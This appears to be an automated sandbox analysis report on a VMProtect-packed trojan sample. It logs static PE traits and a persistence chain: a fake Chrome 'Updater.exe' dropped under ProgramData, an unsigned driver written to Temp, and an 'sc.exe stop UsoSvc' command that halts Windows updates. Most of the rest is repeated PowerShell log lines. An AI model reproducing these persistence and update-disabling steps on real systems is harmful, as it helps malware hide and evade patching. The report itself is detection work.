Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior

Source: C:\Windows\explorer.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Jump to behavior

Source: SecuriteInfo.com.Trojan.Siggen29.54948.7115.19193.exe

Static PE information: Image base 0x140000000 > 0x60000000

Source: SecuriteInfo.com.Trojan.Siggen29.54948.7115.19193.exe

Static file information: File size 6031872 > 1048576

Source: SecuriteInfo.com.Trojan.Siggen29.54948.7115.19193.exe

Static PE information: Raw size of .vmp is bigger than: 0x100000 < 0x585a00

Source: SecuriteInfo.com.Trojan.Siggen29.54948.7115.19193.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Source:

Source: initial sample

Static PE information: section where entry point is pointing to: .vmp

Source: SecuriteInfo.com.Trojan.Siggen29.54948.7115.19193.exe	Static PE information: section name: .00cfg
Source: SecuriteInfo.com.Trojan.Siggen29.54948.7115.19193.exe	Static PE information: section name: .vmp
Source: SecuriteInfo.com.Trojan.Siggen29.54948.7115.19193.exe	Static PE information: section name: .vmp
Source: SecuriteInfo.com.Trojan.Siggen29.54948.7115.19193.exe	Static PE information: section name: .vmp
Source: Updater.exe.0.dr	Static PE information: section name: .00cfg
Source: Updater.exe.0.dr	Static PE information: section name: .vmp
Source: Updater.exe.0.dr	Static PE information: section name: .vmp
Source: Updater.exe.0.dr	Static PE information: section name: .vmp

Source: C:\Windows\System32\conhost.exe

Code function: 57_2_0000000140001394 push qword ptr [0000000140009004h]; ret

57_2_0000000140001403

Persistence and Installation Behavior

Sample is not signed and drops a device driver

Source: C:\ProgramData\GoogleUP\Chrome\Updater.exe

File created: C:\Windows\TEMP\pjjtwoljkwri.sys

Jump to behavior

Source: C:\ProgramData\GoogleUP\Chrome\Updater.exe	File created: C:\Windows\Temp\pjjtwoljkwri.sys			Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen29.54948.7115.19193.exe	File created: C:\ProgramData\GoogleUP\Chrome\Updater.exe			Jump to dropped file

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen29.54948.7115.19193.exe

File created: C:\ProgramData\GoogleUP\Chrome\Updater.exe

Jump to dropped file

Source: C:\ProgramData\GoogleUP\Chrome\Updater.exe

File created: C:\Windows\Temp\pjjtwoljkwri.sys

Jump to dropped file

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen29.54948.7115.19193.exe

Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop UsoSvc

Hooking and other Techniques for Hiding and Protection

Loading BitLocker PowerShell Module

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
